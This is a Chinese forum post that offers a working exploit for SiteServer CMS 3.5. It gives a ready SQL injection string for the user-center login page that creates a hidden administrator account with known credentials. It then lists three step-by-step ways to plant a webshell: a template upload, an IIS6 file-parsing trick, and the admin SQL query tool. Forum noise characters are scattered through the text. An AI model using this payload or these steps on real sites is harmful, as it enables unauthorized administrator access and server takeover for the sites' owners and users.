经测试秒杀最新的3.5版
2 ~/ j, y9 B0 v% m) H7 M9 Mstieserver官网:www.siteserver.cn6 N& V3 c# s8 C9 E: K
EXP:
% U. J- x4 I" C- h# |9 q直接访问UserCenter/login.aspx* J2 b. X/ O$ D r- F
用户名处输入:- n' T' Z( U6 j" R% Q5 s" [
) P, e* Y* F6 c1 z; W
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–) i/ w9 ]+ k9 |
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。3 G4 A: O2 |( R: Z: I# X
之后再访问后台SiteServer/login.aspx用插入的用户登陆7 w3 c: Q8 K1 q, i( t. k
后台拿webshell的三种方法:
0 f4 i) H7 ~+ X7 \. T一、. I# H$ W4 o5 Z
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
8 b% G: ^7 `/ A/ j" L9 u9 P2 }二、
3 r( M0 k5 C# V成员权限-》添加用户-》用户名为:1.asp3 l' q7 o/ f' u$ u. l7 T# {
http://127.0.0.1/usercenter/& Y" s* t- r8 w0 L3 S ?
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' o; ^5 R" O1 S/ O( |5 y1 u0 f3 m(ps:后台添加用户时不会验证是否含有非法字符) c m; F+ M. F% R" O
三、
9 @% f8 |8 m F系统工具-》实用工具-》机器参数查看
# D# m* M+ ~* `6 ^) R可以看到数据库类型、名称,WEB路径
' S( o `( Q5 {- K! g* c7 `* W系统工具-》数据库工具-》SQL语句查询
$ [* W x ~; y& Y2 Y% Q这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对